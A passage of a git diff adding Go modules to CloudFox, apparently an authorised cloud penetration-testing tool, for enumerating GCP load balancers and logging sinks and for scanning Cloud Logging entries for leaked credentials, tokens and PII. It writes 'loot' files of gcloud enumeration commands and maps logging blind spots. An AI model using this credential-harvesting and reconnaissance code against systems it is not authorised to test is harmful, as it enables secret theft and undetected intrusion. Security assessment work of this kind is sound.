projectID), globals.GCP_LOADBALANCERS_MODULE_NAME) + } + + svc := loadbalancerservice.New() + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["loadbalancers-commands"] = &internal.LootFile{ + Name: "loadbalancers-commands", + Contents: "# Load Balancer Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + // Get load balancers + lbs, err := svc.ListLoadBalancers(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOADBALANCERS_MODULE_NAME, + fmt.Sprintf("Could not list load balancers in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectLoadBalancers[projectID] = lbs + for _, lb := range lbs { + m.addToLoot(projectID, lb) + } + m.mu.Unlock() + } + + // Get SSL policies + sslPolicies, err := svc.ListSSLPolicies(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOADBALANCERS_MODULE_NAME, + fmt.Sprintf("Could not list SSL policies in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectSSLPolicies[projectID] = sslPolicies + m.mu.Unlock() + } + + // Get backend services + backends, err := svc.ListBackendServices(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOADBALANCERS_MODULE_NAME, + fmt.Sprintf("Could not list backend services in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectBackendServices[projectID] = backends + m.mu.Unlock() + } +} + +func (m *LoadBalancersModule) addToLoot(projectID string, lb loadbalancerservice.LoadBalancerInfo) { + lootFile := m.LootMap[projectID]["loadbalancers-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# LOAD BALANCER: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Type: %s, Scheme: %s, IP: %s, Port: %s\n\n", + lb.Name, lb.ProjectID, lb.Type, lb.Scheme, lb.IPAddress, lb.Port) + + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + + // Describe forwarding rule + if lb.Region == "global" { + lootFile.Contents += fmt.Sprintf( + "# Describe global forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --global --project=%s\n\n", + lb.Name, lb.ProjectID) + } else { + lootFile.Contents += fmt.Sprintf( + "# Describe regional forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", + lb.Name, lb.Region, lb.ProjectID) + } + + // Backend service commands + for _, backend := range lb.BackendServices { + lootFile.Contents += fmt.Sprintf( + "# Describe backend service:\n"+ + "gcloud compute backend-services describe %s --global --project=%s\n\n", + backend, lb.ProjectID) + } +} + +func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Generate ASCII diagram and add to loot + diagram := m.generateLoadBalancerDiagram() + if diagram != "" { + // Add diagram to the first project's loot + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["loadbalancers-diagram"] = &internal.LootFile{ + Name: "loadbalancers-diagram", + Contents: diagram, + } + break // Only add once for flat output + } + + // For hierarchical output, add to all projects + if m.Hierarchy != nil && !m.FlatOutput { + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["loadbalancers-diagram"] = &internal.LootFile{ + Name: "loadbalancers-diagram", + Contents: diagram, + } + } + } + } + + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// ------------------------------ +// Diagram Generation +// ------------------------------ + +// generateLoadBalancerDiagram creates an ASCII visualization of load balancer architecture +func (m *LoadBalancersModule) generateLoadBalancerDiagram() string { + allLBs := m.getAllLoadBalancers() + if len(allLBs) == 0 { + return "" + } + + // Build a map of backend service name -> actual backends (instance groups, NEGs) + backendDetailsMap := make(map[string][]string) + for _, backends := range m.ProjectBackendServices { + for _, be := range backends { + if len(be.Backends) > 0 { + backendDetailsMap[be.Name] = be.Backends + } + } + } + + // Convert to diagram service types + diagramLBs := make([]diagramservice.LoadBalancerInfo, 0, len(allLBs)) + for _, lb := range allLBs { + // Build backend details for this LB + lbBackendDetails := make(map[string][]string) + for _, beSvc := range lb.BackendServices { + if targets, ok := backendDetailsMap[beSvc]; ok { + lbBackendDetails[beSvc] = targets + } + } + + diagramLBs = append(diagramLBs, diagramservice.LoadBalancerInfo{ + Name: lb.Name, + Type: lb.Type, + Scheme: lb.Scheme, + IPAddress: lb.IPAddress, + Port: lb.Port, + Region: lb.Region, + BackendServices: lb.BackendServices, + SecurityPolicy: lb.SecurityPolicy, + BackendDetails: lbBackendDetails, + }) + } + + // Determine project ID for header (use first project if multiple) + projectID := "" + if len(m.ProjectIDs) == 1 { + projectID = m.ProjectIDs[0] + } + + return diagramservice.DrawLoadBalancerDiagram(diagramLBs, projectID, 90) +} + +func (m *LoadBalancersModule) getLBHeader() []string { + return []string{"Project", "Name", "Type", "Scheme", "Region", "IP Address", "Port", "Backend Services", "Security Policy"} +} + +func (m *LoadBalancersModule) getSSLHeader() []string { + return []string{"Project", "Name", "Min TLS Version", "Profile", "Custom Features"} +} + +func (m *LoadBalancersModule) getBackendHeader() []string { + return []string{"Project", "Name", "Protocol", "Port", "Security Policy", "CDN Enabled", "Health Check", "Session Affinity", "Backends"} +} + +func (m *LoadBalancersModule) lbsToTableBody(lbs []loadbalancerservice.LoadBalancerInfo) [][]string { + var body [][]string + for _, lb := range lbs { + backends := "-" + if len(lb.BackendServices) > 0 { + backends = strings.Join(lb.BackendServices, ", ") + } + secPolicy := "-" + if lb.SecurityPolicy != "" { + secPolicy = lb.SecurityPolicy + } + body = append(body, []string{ + m.GetProjectName(lb.ProjectID), + lb.Name, + lb.Type, + lb.Scheme, + lb.Region, + lb.IPAddress, + lb.Port, + backends, + secPolicy, + }) + } + return body +} + +func (m *LoadBalancersModule) sslPoliciesToTableBody(policies []loadbalancerservice.SSLPolicyInfo) [][]string { + var body [][]string + for _, policy := range policies { + customFeatures := "-" + if len(policy.CustomFeatures) > 0 { + customFeatures = strings.Join(policy.CustomFeatures, ", ") + } + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.Name, + policy.MinTLSVersion, + policy.Profile, + customFeatures, + }) + } + return body +} + +func (m *LoadBalancersModule) backendServicesToTableBody(services []loadbalancerservice.BackendServiceInfo) [][]string { + var body [][]string + for _, be := range services { + secPolicy := "-" + if be.SecurityPolicy != "" { + secPolicy = be.SecurityPolicy + } + healthCheck := "-" + if be.HealthCheck != "" { + healthCheck = be.HealthCheck + } + sessionAffinity := "-" + if be.SessionAffinity != "" { + sessionAffinity = be.SessionAffinity + } + backends := "-" + if len(be.Backends) > 0 { + backends = strings.Join(be.Backends, ", ") + } + body = append(body, []string{ + m.GetProjectName(be.ProjectID), + be.Name, + be.Protocol, + fmt.Sprintf("%d", be.Port), + secPolicy, + shared.BoolToYesNo(be.EnableCDN), + healthCheck, + sessionAffinity, + backends, + }) + } + return body +} + +func (m *LoadBalancersModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if lbs, ok := m.ProjectLoadBalancers[projectID]; ok && len(lbs) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "load-balancers-frontends", + Header: m.getLBHeader(), + Body: m.lbsToTableBody(lbs), + }) + } + + if policies, ok := m.ProjectSSLPolicies[projectID]; ok && len(policies) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "ssl-policies", + Header: m.getSSLHeader(), + Body: m.sslPoliciesToTableBody(policies), + }) + } + + if services, ok := m.ProjectBackendServices[projectID]; ok && len(services) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "load-balancers-backend-services", + Header: m.getBackendHeader(), + Body: m.backendServicesToTableBody(services), + }) + } + + return tableFiles +} + +func (m *LoadBalancersModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectLoadBalancers { + projectIDs[projectID] = true + } + for projectID := range m.ProjectSSLPolicies { + projectIDs[projectID] = true + } + for projectID := range m.ProjectBackendServices { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = LoadBalancersOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOADBALANCERS_MODULE_NAME) + } +} + +func (m *LoadBalancersModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allLBs := m.getAllLoadBalancers() + allSSL := m.getAllSSLPolicies() + allBackends := m.getAllBackendServices() + + var tables []internal.TableFile + + if len(allLBs) > 0 { + tables = append(tables, internal.TableFile{ + Name: "load-balancers-frontends", + Header: m.getLBHeader(), + Body: m.lbsToTableBody(allLBs), + }) + } + + if len(allSSL) > 0 { + tables = append(tables, internal.TableFile{ + Name: "ssl-policies", + Header: m.getSSLHeader(), + Body: m.sslPoliciesToTableBody(allSSL), + }) + } + + if len(allBackends) > 0 { + tables = append(tables, internal.TableFile{ + Name: "load-balancers-backend-services", + Header: m.getBackendHeader(), + Body: m.backendServicesToTableBody(allBackends), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := LoadBalancersOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOADBALANCERS_MODULE_NAME) + } +} diff --git a/gcp/commands/logenum.go b/gcp/commands/logenum.go new file mode 100644 index 00000000..ff645138 --- /dev/null +++ b/gcp/commands/logenum.go @@ -0,0 +1,277 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + logenumservice "github.com/BishopFox/cloudfox/gcp/services/logEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var ( + logEnumHours int + logEnumMaxEntries int + logEnumLogName string +) + +var GCPLoggingEnumCommand = &cobra.Command{ + Use: globals.GCP_LOGGINGENUM_MODULE_NAME, + Aliases: []string{"logging-enum", "log-scan", "sensitive-logs"}, + Short: "Scan Cloud Logging entries for sensitive data (credentials, tokens, PII)", + Long: `Scan Cloud Logging entries for potentially sensitive data. + +This module reads recent log entries and applies content-based pattern matching +to detect credentials, secrets, tokens, PII, and other sensitive information +that may have been inadvertently logged. + +Content patterns detected: +- Credentials: GCP SA keys, private keys, AWS access keys, API keys +- Secrets: Password assignments, bearer tokens, connection strings +- Tokens: JWTs, OAuth tokens, GitHub tokens +- PII: Credit card numbers, SSN patterns + +Flags: + --hours Hours of logs to scan (default 168 = 7 days) + --max-entries Maximum log entries to process per project (default 50000) + --log-name Optional: filter to a specific log name`, + Run: runGCPLoggingEnumCommand, +} + +func init() { + GCPLoggingEnumCommand.Flags().IntVar(&logEnumHours, "hours", 168, "Hours of logs to scan (default 168 = 7 days)") + GCPLoggingEnumCommand.Flags().IntVar(&logEnumMaxEntries, "max-entries", 50000, "Maximum log entries to process per project") + GCPLoggingEnumCommand.Flags().StringVar(&logEnumLogName, "log-name", "", "Optional: filter to a specific log name") +} + +type LogEnumModule struct { + gcpinternal.BaseGCPModule + ProjectEntries map[string][]logenumservice.SensitiveLogEntry + LootMap map[string]map[string]*internal.LootFile + Hours int + MaxEntries int + LogNameFilter string + mu sync.Mutex +} + +type LogEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LogEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LogEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPLoggingEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGGINGENUM_MODULE_NAME) + if err != nil { + return + } + + module := &LogEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectEntries: make(map[string][]logenumservice.SensitiveLogEntry), + LootMap: make(map[string]map[string]*internal.LootFile), + Hours: logEnumHours, + MaxEntries: logEnumMaxEntries, + LogNameFilter: logEnumLogName, + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *LogEnumModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Scanning log entries (last %d hours, max %d entries per project)...", + m.Hours, m.MaxEntries), globals.GCP_LOGGINGENUM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGINGENUM_MODULE_NAME, m.processProject) + + allEntries := m.getAllEntries() + if len(allEntries) == 0 { + logger.InfoM("No sensitive log entries found", globals.GCP_LOGGINGENUM_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, entry := range allEntries { + switch entry.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d sensitive log entries (%d CRITICAL, %d HIGH)", + len(allEntries), criticalCount, highCount), globals.GCP_LOGGINGENUM_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *LogEnumModule) getAllEntries() []logenumservice.SensitiveLogEntry { + var all []logenumservice.SensitiveLogEntry + for _, entries := range m.ProjectEntries { + all = append(all, entries...) + } + return all +} + +func (m *LogEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning logs in project: %s", projectID), globals.GCP_LOGGINGENUM_MODULE_NAME) + } + + svc := logenumservice.New() + + entries, err := svc.EnumerateSensitiveLogs(projectID, m.Hours, m.MaxEntries, m.LogNameFilter) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGINGENUM_MODULE_NAME, + fmt.Sprintf("Could not scan logs in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectEntries[projectID] = entries + + // Build loot + if len(entries) > 0 { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + lootFile := &internal.LootFile{ + Name: "logging-enum-commands", + Contents: "# Cloud Logging Read Commands for Sensitive Entries\n# Generated by CloudFox\n\n", + } + for _, entry := range entries { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s (%s)\ngcloud logging read 'insertId=\"%s\"' --project=%s --format=json\n\n", + entry.RiskLevel, entry.Category, entry.Description, entry.Timestamp, + entry.InsertID, projectID, + ) + } + m.LootMap[projectID]["logging-enum-commands"] = lootFile + } + m.mu.Unlock() +} + +func (m *LogEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *LogEnumModule) getHeader() []string { + return []string{"Project", "Log Name", "Timestamp", "Category", "Risk Level", "Description", "Resource Type", "Snippet"} +} + +func (m *LogEnumModule) entriesToTableBody(entries []logenumservice.SensitiveLogEntry) [][]string { + var body [][]string + for _, entry := range entries { + // Shorten log name for display + shortLogName := entry.LogName + if idx := strings.LastIndex(shortLogName, "/"); idx >= 0 { + shortLogName = shortLogName[idx+1:] + } + body = append(body, []string{ + m.GetProjectName(entry.ProjectID), + shortLogName, + entry.Timestamp, + entry.Category, + entry.RiskLevel, + entry.Description, + entry.ResourceType, + entry.Snippet, + }) + } + return body +} + +func (m *LogEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + entries := m.ProjectEntries[projectID] + if len(entries) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "logging-enum", + Header: m.getHeader(), + Body: m.entriesToTableBody(entries), + }, + } +} + +func (m *LogEnumModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, entries := range m.ProjectEntries { + if len(entries) == 0 { + continue + } + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = LogEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOGGINGENUM_MODULE_NAME) + } +} + +func (m *LogEnumModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allEntries := m.getAllEntries() + if len(allEntries) == 0 { + return + } + + tables := []internal.TableFile{ + { + Name: "logging-enum", + Header: m.getHeader(), + Body: m.entriesToTableBody(allEntries), + }, + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := LogEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGGINGENUM_MODULE_NAME) + } +} diff --git a/gcp/commands/logging.go b/gcp/commands/logging.go new file mode 100644 index 00000000..38e61632 --- /dev/null +++ b/gcp/commands/logging.go @@ -0,0 +1,658 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + LoggingService "github.com/BishopFox/cloudfox/gcp/services/loggingService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoggingCommand = &cobra.Command{ + Use: globals.GCP_LOGGING_MODULE_NAME, + Aliases: []string{"logs", "sinks", "log-sinks", "logging-gaps"}, + Short: "Enumerate Cloud Logging configuration including sinks, metrics, and logging gaps", + Long: `Enumerate Cloud Logging configuration across projects including sinks, metrics, and logging gaps. + +Features: +- Lists all logging sinks (log exports) +- Shows sink destinations (Storage, BigQuery, Pub/Sub, Logging buckets) +- Identifies cross-project log exports +- Shows sink filters and exclusions +- Lists log-based metrics for alerting +- Identifies resources with missing or incomplete logging +- Generates gcloud commands for logging enumeration + +Log Sinks: +- Destination: Where logs are exported (bucket, dataset, topic) +- CrossProject: Whether logs are exported to another project +- WriterIdentity: Service account used for export +- Filter: What logs are included/excluded + +Logging Gaps (resources with incomplete logging): +- Cloud Storage buckets without access logging +- VPC subnets without flow logs +- GKE clusters with incomplete logging configuration +- Cloud SQL instances without query/connection logging + +Security Considerations: +- Cross-project exports may leak logs to external projects +- Sink writer identity may have excessive permissions +- Disabled sinks may indicate log evasion +- Missing logging on resources creates detection blind spots`, + Run: runGCPLoggingCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LoggingModule struct { + gcpinternal.BaseGCPModule + + ProjectSinks map[string][]LoggingService.SinkInfo // projectID -> sinks + ProjectMetrics map[string][]LoggingService.MetricInfo // projectID -> metrics + ProjectGaps map[string][]LoggingService.LoggingGap // projectID -> logging gaps + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LoggingOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoggingOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoggingOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPLoggingCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGGING_MODULE_NAME) + if err != nil { + return + } + + module := &LoggingModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectSinks: make(map[string][]LoggingService.SinkInfo), + ProjectMetrics: make(map[string][]LoggingService.MetricInfo), + ProjectGaps: make(map[string][]LoggingService.LoggingGap), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *LoggingModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGING_MODULE_NAME, m.processProject) + + allSinks := m.getAllSinks() + allMetrics := m.getAllMetrics() + allGaps := m.getAllGaps() + + if len(allSinks) == 0 && len(allMetrics) == 0 && len(allGaps) == 0 { + logger.InfoM("No logging configuration found", globals.GCP_LOGGING_MODULE_NAME) + return + } + + // Count interesting sinks + crossProjectCount := 0 + disabledCount := 0 + for _, sink := range allSinks { + if sink.IsCrossProject { + crossProjectCount++ + } + if sink.Disabled { + disabledCount++ + } + } + + msg := fmt.Sprintf("Found %d sink(s), %d metric(s), %d logging gap(s)", len(allSinks), len(allMetrics), len(allGaps)) + if crossProjectCount > 0 { + msg += fmt.Sprintf(" [%d cross-project]", crossProjectCount) + } + if disabledCount > 0 { + msg += fmt.Sprintf(" [%d disabled]", disabledCount) + } + logger.SuccessM(msg, globals.GCP_LOGGING_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllSinks returns all sinks from all projects +func (m *LoggingModule) getAllSinks() []LoggingService.SinkInfo { + var all []LoggingService.SinkInfo + for _, sinks := range m.ProjectSinks { + all = append(all, sinks...) + } + return all +} + +// getAllMetrics returns all metrics from all projects +func (m *LoggingModule) getAllMetrics() []LoggingService.MetricInfo { + var all []LoggingService.MetricInfo + for _, metrics := range m.ProjectMetrics { + all = append(all, metrics...) + } + return all +} + +// getAllGaps returns all logging gaps from all projects +func (m *LoggingModule) getAllGaps() []LoggingService.LoggingGap { + var all []LoggingService.LoggingGap + for _, gaps := range m.ProjectGaps { + all = append(all, gaps...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LoggingModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Logging in project: %s", projectID), globals.GCP_LOGGING_MODULE_NAME) + } + + ls := LoggingService.New() + + var projectSinks []LoggingService.SinkInfo + var projectMetrics []LoggingService.MetricInfo + var projectGaps []LoggingService.LoggingGap + + // Get sinks + sinks, err := ls.Sinks(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate logging sinks in project %s", projectID)) + } else { + projectSinks = append(projectSinks, sinks...) + } + + // Get metrics + metrics, err := ls.Metrics(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate log metrics in project %s", projectID)) + } else { + projectMetrics = append(projectMetrics, metrics...) + } + + // Get logging gaps + gaps, err := ls.LoggingGaps(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate logging gaps in project %s", projectID)) + } + } else { + projectGaps = append(projectGaps, gaps...) + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectSinks[projectID] = projectSinks + m.ProjectMetrics[projectID] = projectMetrics + m.ProjectGaps[projectID] = projectGaps + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["logging-commands"] = &internal.LootFile{ + Name: "logging-commands", + Contents: "# Cloud Logging Enumeration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + m.generateLootCommands(projectID, projectSinks, projectMetrics, projectGaps) + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d sink(s), %d metric(s), %d gap(s) in project %s", len(projectSinks), len(projectMetrics), len(projectGaps), projectID), globals.GCP_LOGGING_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LoggingModule) generateLootCommands(projectID string, sinks []LoggingService.SinkInfo, metrics []LoggingService.MetricInfo, gaps []LoggingService.LoggingGap) { + lootFile := m.LootMap[projectID]["logging-commands"] + if lootFile == nil { + return + } + + // Project-level logging enumeration + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PROJECT: %s\n"+ + "# =============================================================================\n\n", projectID) + + // Sinks enumeration commands + lootFile.Contents += "# === LOG SINKS ===\n\n" + lootFile.Contents += fmt.Sprintf("gcloud logging sinks list --project=%s\n\n", projectID) + + for _, sink := range sinks { + lootFile.Contents += fmt.Sprintf("# Sink: %s (%s)\n", sink.Name, sink.DestinationType) + lootFile.Contents += fmt.Sprintf("gcloud logging sinks describe %s --project=%s\n", sink.Name, projectID) + + // Add destination-specific enumeration commands + switch sink.DestinationType { + case "storage": + if sink.DestinationBucket != "" { + lootFile.Contents += fmt.Sprintf("# Check bucket logging destination:\ngsutil ls gs://%s/\n", sink.DestinationBucket) + } + case "bigquery": + if sink.DestinationDataset != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = projectID + } + lootFile.Contents += fmt.Sprintf("# Check BigQuery logging destination:\nbq ls %s:%s\n", destProject, sink.DestinationDataset) + } + case "pubsub": + if sink.DestinationTopic != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = projectID + } + lootFile.Contents += fmt.Sprintf("# Check Pub/Sub logging destination:\ngcloud pubsub topics describe %s --project=%s\n", sink.DestinationTopic, destProject) + } + } + + if sink.IsCrossProject { + lootFile.Contents += fmt.Sprintf("# NOTE: Cross-project export to %s\n", sink.DestinationProject) + } + lootFile.Contents += "\n" + } + + // Metrics enumeration commands + if len(metrics) > 0 { + lootFile.Contents += "# === LOG-BASED METRICS ===\n\n" + lootFile.Contents += fmt.Sprintf("gcloud logging metrics list --project=%s\n\n", projectID) + + for _, metric := range metrics { + lootFile.Contents += fmt.Sprintf("# Metric: %s\n", metric.Name) + lootFile.Contents += fmt.Sprintf("gcloud logging metrics describe %s --project=%s\n\n", metric.Name, projectID) + } + } + + // Logging gaps enumeration commands + if len(gaps) > 0 { + lootFile.Contents += "# === LOGGING GAPS ===\n\n" + lootFile.Contents += "# Commands to verify logging configuration on resources with gaps\n\n" + + for _, gap := range gaps { + lootFile.Contents += fmt.Sprintf("# %s: %s (%s) - %s\n", gap.ResourceType, gap.ResourceName, gap.Location, gap.LoggingStatus) + lootFile.Contents += fmt.Sprintf("# Missing: %s\n", strings.Join(gap.MissingLogs, ", ")) + + switch gap.ResourceType { + case "bucket": + lootFile.Contents += fmt.Sprintf("gsutil logging get gs://%s\n", gap.ResourceName) + case "subnet": + lootFile.Contents += fmt.Sprintf("gcloud compute networks subnets describe %s --region=%s --project=%s --format='value(logConfig)'\n", gap.ResourceName, gap.Location, projectID) + case "gke": + lootFile.Contents += fmt.Sprintf("gcloud container clusters describe %s --location=%s --project=%s --format='value(loggingService,loggingConfig)'\n", gap.ResourceName, gap.Location, projectID) + case "cloudsql": + lootFile.Contents += fmt.Sprintf("gcloud sql instances describe %s --project=%s --format='value(settings.databaseFlags)'\n", gap.ResourceName, projectID) + } + lootFile.Contents += "\n" + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getSinksHeader returns the header for sinks table +func (m *LoggingModule) getSinksHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Sink Name", + "Destination Type", + "Destination", + "Cross-Project", + "Disabled", + "Writer Identity", + "Filter", + } +} + +// getMetricsHeader returns the header for metrics table +func (m *LoggingModule) getMetricsHeader() []string 